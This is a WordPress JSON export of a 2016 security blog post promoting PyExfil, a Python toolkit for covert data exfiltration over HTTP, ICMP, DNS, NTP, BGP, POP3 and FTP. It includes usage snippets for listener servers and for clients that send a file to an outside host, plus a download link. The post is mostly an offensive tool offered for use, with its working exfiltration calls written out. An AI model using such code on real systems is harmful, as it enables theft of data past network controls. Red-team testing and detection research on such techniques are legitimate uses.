{"id":4275,"date":"2016-11-22T03:48:19","date_gmt":"2016-11-21T19:48:19","guid":{"rendered":"https:\/\/www.darknet.org.uk\/?p=4275"},"modified":"2016-11-22T03:48:28","modified_gmt":"2016-11-21T19:48:28","slug":"pyexfil-python-data-exfiltration-tools","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2016\/11\/pyexfil-python-data-exfiltration-tools\/","title":{"rendered":"PyExfil &#8211; Python Data Exfiltration Tools"},"content":{"rendered":"<p>PyExfil started as a Proof of Concept (PoC) and has ended up turning into a Python Data Exfiltration toolkit, which can execute various techniques based around commonly allowed protocols (HTTP, ICMP, DNS etc).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.darknet.org.uk\/wp-content\/uploads\/2016\/11\/PyExfil-Python-Data-Exfiltration-Tools-640x400.jpg\" alt=\"PyExfil - Python Data Exfiltration Tools\" width=\"640\" height=\"400\" class=\"aligncenter size-medium wp-image-4344\" srcset=\"https:\/\/www.darknet.org.uk\/wp-content\/uploads\/2016\/11\/PyExfil-Python-Data-Exfiltration-Tools-640x400.jpg 640w, https:\/\/www.darknet.org.uk\/wp-content\/uploads\/2016\/11\/PyExfil-Python-Data-Exfiltration-Tools.jpg 900w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><\/p>\n<p>The package is very early stage (alpha release) so is not fully tested, any feedback and commits are welcomed by the author.<\/p>\n<h3>Features<\/h3>\n<p>Currently PyExfil supports:<\/p>\n<ul>\n<li>DNS query<\/li>\n<li>HTTP Cookie<\/li>\n<li>ICMP (8)<\/li>\n<li>NTP requests<\/li>\n<li>BGP Open<\/li>\n<li>POP3 Authentication (as password)<\/li>\n<li>FTP MKDIR technique<\/li>\n<\/ul>\n<h3>Usage<\/h3>\n<h4>HTTP Exfilatration Server<\/h4>\n<pre>#!\/usr\/bin\/python\r\nfrom exfiltration.http_exfiltration import *\r\ndef main():\r\n    print \"Starting a listener: \"\r\n    listen(\"127.0.0.1\", 80)\r\n\r\nif __name__ == \"__main__\":\r\n    main()<\/pre>\n<h4>HTTP Exfiltration Client<\/h4>\n<pre>#!\/usr\/bin\/python\r\n\r\nfrom exfiltration.http_exfiltration import *\r\n\r\ndef main():\r\n    FILE_TO_EXFIL = \"\/bin\/bash\"\r\n    ADDR = \"www.morirt.com\"\r\n\r\n    if send_file(ADDR, FILE_TO_EXFIL) == 0:\r\n        print \"File exfiltrated okay.\"\r\n    else:\r\n        print \"Damn thing failed.\"\r\n\r\nif __name__ == \"__main__\":\r\n    main()<\/pre>\n<script async src=\"https:\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js?client=ca-pub-3033787195489589\"\r\n     crossorigin=\"anonymous\"><\/script>\r\n<!-- Darknet Responsive Post Ad Links [previously link ad unit] -->\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-3033787195489589\"\r\n     data-ad-slot=\"5456620019\"\r\n     data-ad-format=\"auto\"><\/ins>\r\n<script>\r\n     (adsbygoogle = window.adsbygoogle || []).push({});\r\n<\/script>\n<h4>ICMP Server<\/h4>\n<pre>#!\/usr\/bin\/python\r\n\r\nfrom exfiltration.icmp_exfiltration import *\r\n\r\ndef main():\r\n    ADDR = \"127.0.0.1\"\r\n    TMP_PATH = \"\/tmp\/\"\r\n\r\n    init_listener(ADDR, TMP_PATH)\r\n\r\nif __name__ == \"__main__\":\r\n    main()<\/pre>\n<h4>ICMP Exfiltrator<\/h4>\n<pre>#!\/usr\/bin\/python\r\n\r\nfrom exfiltration.icmp_exfiltration import *\r\n\r\ndef main():\r\n    FILE_TO_EXFIL = \"\/bin\/bash\"\r\n    ADDR = \"www.morirt.com\"\r\n\r\n    if send_file(ADDR, FILE_TO_EXFIL) == 0:\r\n        print \"File exfiltrated okay.\"\r\n    else:\r\n        print \"Damn thing failed.\"\r\n\r\nif __name__ == \"__main__\":\r\n    main()<\/pre>\n<p>You can download PyExfil here:<\/p>\n<p><a href=\"https:\/\/github.com\/ytisf\/PyExfil\/archive\/v0.1-alpha.zip\">PyExfil-v0.1-alpha.zip<\/a><\/p>\n<p>Or read more <a href=\"https:\/\/github.com\/ytisf\/PyExfil\">here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PyExfil started as a Proof of Concept (PoC) and has ended up turning into a Python Data Exfiltration toolkit, which can execute various techniques based around commonly allowed protocols (HTTP, ICMP, DNS etc). The package is very early stage (alpha release) so is not fully tested, any feedback and commits are welcomed by the author. [&hellip;]<\/p>\n","protected":false},"author":25,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"PyExfil started as a Proof of Concept (PoC) and has ended up turning into a Python Data Exfiltration toolkit, which can execute various techniques","_seopress_robots_index":"","_genesis_hide_title":false,"_genesis_hide_breadcrumbs":false,"_genesis_hide_singular_image":false,"_genesis_hide_footer_widgets":false,"_genesis_custom_body_class":"","_genesis_custom_post_class":"","_genesis_layout":"","footnotes":""},"categories":[9,5],"tags":[9755,284],"featured_image_src":null,"featured_image_src_square":null,"author_info":{"display_name":"Darknet","author_link":"https:\/\/www.darknet.org.uk\/author\/darknet\/"},"_links":{"self":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/posts\/4275"}],"collection":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/users\/25"}],"replies":[{"embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/comments?post=4275"}],"version-history":[{"count":0,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/posts\/4275\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/media?parent=4275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/categories?post=4275"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/tags?post=4275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}